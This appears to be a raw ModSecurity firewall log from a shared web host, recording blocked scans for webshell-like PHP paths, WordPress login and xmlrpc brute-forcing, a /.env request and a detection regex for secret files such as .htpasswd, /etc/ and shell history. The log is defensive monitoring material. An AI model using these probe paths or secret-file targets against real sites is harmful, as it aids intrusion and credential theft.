[Tue May 26 18:05:31.176288 2026] [security2:error] [pid 960743:tid 960903] [client 45.154.98.198:64444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/rzkeanby.php"] [unique_id "ahWTk_QvEln_BHBy2zJ5EgAAAKM"], referer: www.google.com
[Tue May 26 18:05:31.202499 2026] [security2:error] [pid 960743:tid 960891] [client 45.154.98.198:53925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.new.anujtradingco.com"] [uri "/jknreshy.php"] [unique_id "ahWTk_QvEln_BHBy2zJ5FgAAAJc"], referer: www.google.com
[Tue May 26 18:05:31.283652 2026] [security2:error] [pid 960743:tid 960909] [client 185.192.70.76:30571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/js/wp-login.php"] [unique_id "ahWTkvQvEln_BHBy2zJ5CAAAAKk"]
[Tue May 26 18:05:31.299919 2026] [security2:error] [pid 960743:tid 960953] [client 82.76.238.33:65031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTk_QvEln_BHBy2zJ5GAAAANU"]
[Tue May 26 18:05:31.300016 2026] [security2:error] [pid 960743:tid 960953] [client 82.76.238.33:65031] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTk_QvEln_BHBy2zJ5GAAAANU"]
[Tue May 26 18:05:32.911086 2026] [security2:error] [pid 960743:tid 960964] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTlPQvEln_BHBy2zJ5NgAAAOA"]
[Tue May 26 18:05:33.398112 2026] [security2:error] [pid 960743:tid 960884] [client 185.192.70.73:34641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/install.php"] [unique_id "ahWTlfQvEln_BHBy2zJ5WQAAAJA"]
[Tue May 26 18:05:34.299891 2026] [security2:error] [pid 960743:tid 960928] [client 185.192.70.68:24679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/blue/rk2.php"] [unique_id "ahWTlvQvEln_BHBy2zJ5dwAAALw"]
[Tue May 26 18:05:34.303456 2026] [security2:error] [pid 960743:tid 960991] [client 104.23.223.27:10627] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "paqys.com"] [uri "/index.php"] [unique_id "ahWTlfQvEln_BHBy2zJ5YQAAAPs"]
[Tue May 26 18:05:35.361012 2026] [security2:error] [pid 960743:tid 960975] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTlvQvEln_BHBy2zJ5lAAAAOs"]
[Tue May 26 18:05:35.641034 2026] [security2:error] [pid 960743:tid 960818] [remote 104.23.223.46:9469] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWTl_QvEln_BHBy2zJ5nAAA6ko"]
[Tue May 26 18:05:36.172030 2026] [security2:error] [pid 960743:tid 960978] [client 185.192.70.68:52637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/images/class-config.php"] [unique_id "ahWTmPQvEln_BHBy2zJ5tQAAAO4"]
[Tue May 26 18:05:36.722649 2026] [security2:error] [pid 960743:tid 960933] [client 176.65.139.235:59862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.vcresco.com"] [uri "/.env"] [unique_id "ahWTmPQvEln_BHBy2zJ5wwAAAME"]
[Tue May 26 18:05:37.576693 2026] [security2:error] [pid 960743:tid 960930] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTmfQvEln_BHBy2zJ50wAAAL4"]
[Tue May 26 18:05:37.601481 2026] [security2:error] [pid 960743:tid 960974] [client 185.192.70.92:28115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/components/com_jea/views/form/tmpl/size.php"] [unique_id "ahWTmfQvEln_BHBy2zJ53gAAAOo"]
[Tue May 26 18:05:38.365436 2026] [security2:error] [pid 960743:tid 960806] [remote 161.97.109.81:43126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTmvQvEln_BHBy2zJ58QAAqz4"]
[Tue May 26 18:05:39.116027 2026] [security2:error] [pid 960743:tid 960996] [client 5.255.120.167:35290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.120.255.5.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahWTm_QvEln_BHBy2zJ6CQAAAQA"]
[Tue May 26 18:05:39.609677 2026] [security2:error] [pid 960743:tid 960985] [client 195.178.110.48:49744] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.centrefororalhealth.in.md-74.webhostbox.net"] [uri "/"] [unique_id "ahWTm_QvEln_BHBy2zJ6GwAAAPU"]
[Tue May 26 18:05:40.221897 2026] [security2:error] [pid 960743:tid 960860] [remote 216.185.214.209:47854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTnPQvEln_BHBy2zJ6MQAAt3Q"]
[Tue May 26 18:05:40.404613 2026] [security2:error] [pid 960743:tid 960894] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTm_QvEln_BHBy2zJ6LQAAAJo"]
[Tue May 26 18:05:40.413362 2026] [security2:error] [pid 960743:tid 960983] [client 185.192.70.84:20575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/templates/beez/index.php"] [unique_id "ahWTnPQvEln_BHBy2zJ6PgAAAPM"]
[Tue May 26 18:05:40.418120 2026] [security2:error] [pid 960743:tid 960920] [client 5.255.120.167:39950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.120.255.5.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/partners.php"] [unique_id "ahWTnPQvEln_BHBy2zJ6PwAAALQ"]
[Tue May 26 18:05:40.420369 2026] [security2:error] [pid 960743:tid 960905] [client 5.255.120.167:39912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.120.255.5.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/about.php"] [unique_id "ahWTnPQvEln_BHBy2zJ6QAAAAKU"]
[Tue May 26 18:05:41.676595 2026] [security2:error] [pid 960743:tid 960864] [remote 5.42.158.148:44568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTnfQvEln_BHBy2zJ6YwAAkHg"]
[Tue May 26 18:05:41.755008 2026] [security2:error] [pid 960743:tid 960947] [client 82.76.238.33:65451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTnfQvEln_BHBy2zJ6bAAAAM8"]
[Tue May 26 18:05:41.755134 2026] [security2:error] [pid 960743:tid 960947] [client 82.76.238.33:65451] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTnfQvEln_BHBy2zJ6bAAAAM8"]
[Tue May 26 18:05:42.269287 2026] [security2:error] [pid 960743:tid 960945] [client 185.192.70.101:53591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/bypass.php"] [unique_id "ahWTnvQvEln_BHBy2zJ6gQAAAM0"]
[Tue May 26 18:05:42.379607 2026] [security2:error] [pid 960743:tid 960927] [client 5.255.120.167:39980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.120.255.5.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/products.php"] [unique_id "ahWTnvQvEln_BHBy2zJ6ggAAALs"]
[Tue May 26 18:05:42.563413 2026] [security2:error] [pid 960743:tid 960952] [client 69.58.64.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWTnvQvEln_BHBy2zJ6hQAAANQ"], referer: https://anujtradingco.com
[Tue May 26 18:05:43.704181 2026] [security2:error] [pid 960743:tid 960923] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTn_QvEln_BHBy2zJ6mwAAALc"]
[Tue May 26 18:05:43.823789 2026] [security2:error] [pid 960743:tid 960993] [client 185.192.70.68:55107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/class.php"] [unique_id "ahWTn_QvEln_BHBy2zJ6sAAAAP0"]
[Tue May 26 18:05:45.100376 2026] [security2:error] [pid 960743:tid 960756] [remote 5.42.158.148:44568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTofQvEln_BHBy2zJ63QAA4Aw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:05:45.456401 2026] [security2:error] [pid 960743:tid 960757] [remote 163.61.60.30:59624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWTofQvEln_BHBy2zJ67AAAqw0"]
[Tue May 26 18:05:45.461900 2026] [security2:error] [pid 960743:tid 960894] [client 185.192.70.80:32245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/light/profile.php"] [unique_id "ahWTofQvEln_BHBy2zJ67QAAAJo"]
[Tue May 26 18:05:45.607085 2026] [security2:error] [pid 960743:tid 960918] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTofQvEln_BHBy2zJ64wAAALI"]
[Tue May 26 18:05:45.990177 2026] [security2:error] [pid 960743:tid 960826] [remote 163.61.60.30:59624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWTofQvEln_BHBy2zJ7BQAAs1I"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:05:46.736465 2026] [security2:error] [pid 960743:tid 960829] [remote 195.88.211.70:50942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.211.88.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTovQvEln_BHBy2zJ7GAAAplU"]
[Tue May 26 18:05:46.993177 2026] [security2:error] [pid 960743:tid 960836] [remote 154.66.198.148:62968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWTovQvEln_BHBy2zJ7IQAA91w"]
[Tue May 26 18:05:47.077790 2026] [security2:error] [pid 960743:tid 960961] [client 160.119.76.58:40910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahWTovQvEln_BHBy2zJ7IAAAAN0"]
[Tue May 26 18:05:47.091667 2026] [security2:error] [pid 960743:tid 960885] [client 185.192.70.101:49533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/product.php"] [unique_id "ahWTo_QvEln_BHBy2zJ7KAAAAJE"]
[Tue May 26 18:05:47.685304 2026] [security2:error] [pid 960743:tid 960920] [client 160.119.76.58:40924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-login.php"] [unique_id "ahWTo_QvEln_BHBy2zJ7NgAAALQ"]
[Tue May 26 18:05:47.858317 2026] [security2:error] [pid 960743:tid 960988] [client 185.191.171.11:36548] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/kids/list/"] [unique_id "ahWTo_QvEln_BHBy2zJ7PgAAAPg"]
[Tue May 26 18:05:47.858435 2026] [security2:error] [pid 960743:tid 960988] [client 185.191.171.11:36548] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/kids/list/"] [unique_id "ahWTo_QvEln_BHBy2zJ7PgAAAPg"]
[Tue May 26 18:05:48.252552 2026] [security2:error] [pid 960743:tid 960960] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTo_QvEln_BHBy2zJ7PQAAANw"]
[Tue May 26 18:05:48.822671 2026] [security2:error] [pid 960743:tid 960948] [client 185.192.70.80:42213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/uploads/autoload_classmap.php"] [unique_id "ahWTpPQvEln_BHBy2zJ7VgAAANA"]
[Tue May 26 18:05:49.573919 2026] [security2:error] [pid 960743:tid 960758] [remote 121.200.216.55:34310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWTpfQvEln_BHBy2zJ7ZwAA_w4"]
[Tue May 26 18:05:49.849218 2026] [security2:error] [pid 960743:tid 960909] [client 45.148.10.204:39970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "shahvishaal.com"] [uri "/index.php"] [unique_id "ahWTpPQvEln_BHBy2zJ7TgAAAKk"]
[Tue May 26 18:05:49.857599 2026] [security2:error] [pid 960743:tid 961000] [client 45.148.10.204:39954] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "shahvishaal.com"] [uri "/index.php"] [unique_id "ahWTpPQvEln_BHBy2zJ7TQAAAQQ"]
[Tue May 26 18:05:49.926680 2026] [security2:error] [pid 960743:tid 960901] [client 45.148.10.204:39950] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "shahvishaal.com"] [uri "/index.php"] [unique_id "ahWTpPQvEln_BHBy2zJ7TAAAAKE"]
[Tue May 26 18:05:50.556176 2026] [security2:error] [pid 960743:tid 960992] [client 68.183.190.139:52437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/xmlrpc.php"] [unique_id "ahWTpvQvEln_BHBy2zJ7dgAAAPw"]
[Tue May 26 18:05:50.556318 2026] [security2:error] [pid 960743:tid 960992] [client 68.183.190.139:52437] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "eco-green.com.mx"] [uri "/xmlrpc.php"] [unique_id "ahWTpvQvEln_BHBy2zJ7dgAAAPw"]
[Tue May 26 18:05:50.947880 2026] [security2:error] [pid 960743:tid 960934] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTpvQvEln_BHBy2zJ7fwAAAMI"]
[Tue May 26 18:05:51.017435 2026] [security2:error] [pid 960743:tid 960906] [client 185.192.70.78:36973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/ask.php"] [unique_id "ahWTp_QvEln_BHBy2zJ7jQAAAKY"]
[Tue May 26 18:05:51.176214 2026] [security2:error] [pid 960743:tid 960994] [client 68.183.190.139:52471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/xmlrpc.php"] [unique_id "ahWTp_QvEln_BHBy2zJ7mAAAAP4"]
[Tue May 26 18:05:51.176336 2026] [security2:error] [pid 960743:tid 960994] [client 68.183.190.139:52471] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "eco-green.com.mx"] [uri "/xmlrpc.php"] [unique_id "ahWTp_QvEln_BHBy2zJ7mAAAAP4"]
[Tue May 26 18:05:51.448301 2026] [security2:error] [pid 960743:tid 960910] [client 202.76.136.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTp_QvEln_BHBy2zJ7kAAAAKo"]
[Tue May 26 18:05:52.068453 2026] [security2:error] [pid 960743:tid 960904] [client 82.76.238.33:49751] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTqPQvEln_BHBy2zJ7pwAAAKQ"]
[Tue May 26 18:05:52.068583 2026] [security2:error] [pid 960743:tid 960904] [client 82.76.238.33:49751] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWTqPQvEln_BHBy2zJ7pwAAAKQ"]
[Tue May 26 18:05:53.030257 2026] [security2:error] [pid 960743:tid 960891] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTqPQvEln_BHBy2zJ7ugAAAJc"]
[Tue May 26 18:05:53.406670 2026] [security2:error] [pid 960743:tid 960910] [client 185.192.70.79:59675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 79.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/rest-api/about.php"] [unique_id "ahWTqfQvEln_BHBy2zJ7zwAAAKo"]
